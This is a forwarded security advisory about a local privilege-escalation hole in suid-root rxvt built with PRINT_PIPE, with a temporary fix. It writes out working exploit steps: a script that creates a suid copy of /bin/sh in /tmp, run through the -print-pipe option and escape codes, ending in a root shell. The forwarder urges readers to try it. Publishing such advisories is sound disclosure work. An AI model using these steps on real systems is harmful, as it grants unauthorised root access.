[Fwd: SECURITY: rxvt security hole]
Hi,
This one is a REAL alert, try it and you get root in 30 seconds...
Gilad.
David J Meltzer wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> [This was recently forwarded over the linux-alert mailing list. I left
> the full text of the exploit in this post due to the fact that it is
> already quite well publicized. I have not verified the exploit code
> myself. --Jeff.]
>
> There is a major security hole in rxvt, a terminal emulator for X, when it
> is run on systems suid root, as is required on many configurations in order to
> write to the utmp file. It is obvious from the code that this program was
> not written to be run suid root, it's a pity that sysadmins that install the
> compiled versions of this sort of code don't see the same warnings of 'run
> suid root at your own risk' that the people that put together a distribution
> with it that way see in the makefile.
> The conditions that allow this particular hole to be exploited are rxvt
> compiled with the PRINT_PIPE option, and running suid root. The program
> sets the pipe to "lpr", without a pathname, but it's even easier than that
> to exploit because we can set the pipe to whatever we want with the -print-pipe
> option on the rxvt command line. Although the program gives up its root
> privileges when forking to run a shell or other command, the original program
> continues running suid root the entire execution of the program.
> Because the popen() call runs as root, whatever program that pipe opens
> will execute immediately as root. In order to start the printer pipe, the
> vt100 printer-on command is ESC[5i. The pipe can then be closed with the
> printer-off command, ESC[4i. Exploiting this is extremely easy.
>
> Program: rxvt
> Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
> rxvt suid root (and compiled with PRINT_PIPE)
> Requirements: account on system, X server
> Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
> Security Compromise: root
> Author: Dave M. (davem@cmu.edu)
> Synopsis: rxvt fails to give up root privileges before
> opening a pipe to a program that can be specified
> by the user.
>
> Exploit:
> 1. Set DISPLAY environment variable if necessary so you can use x clients.
> 2. In user shell:
> $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
> $ chmod +x /tmp/rxbug
> $ rxvt -print-pipe /tmp/rxbug
> 3. In rxvt xclient:
> $ cat
> ESC[5i
> ESC[4i
> (The client will close at this point with a broken pipe)
> 4. $ /tmp/rxsh
> # whoami
> root
> #
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
>
> iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> r16NALs+Zwo=
> =BzNN
> -----END PGP SIGNATURE-----
>
> ------------------------------------------------------------------------
> The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> have their implicit approval for security announcements, by prior
> arrangement.
> ------------------------------------------------------------------------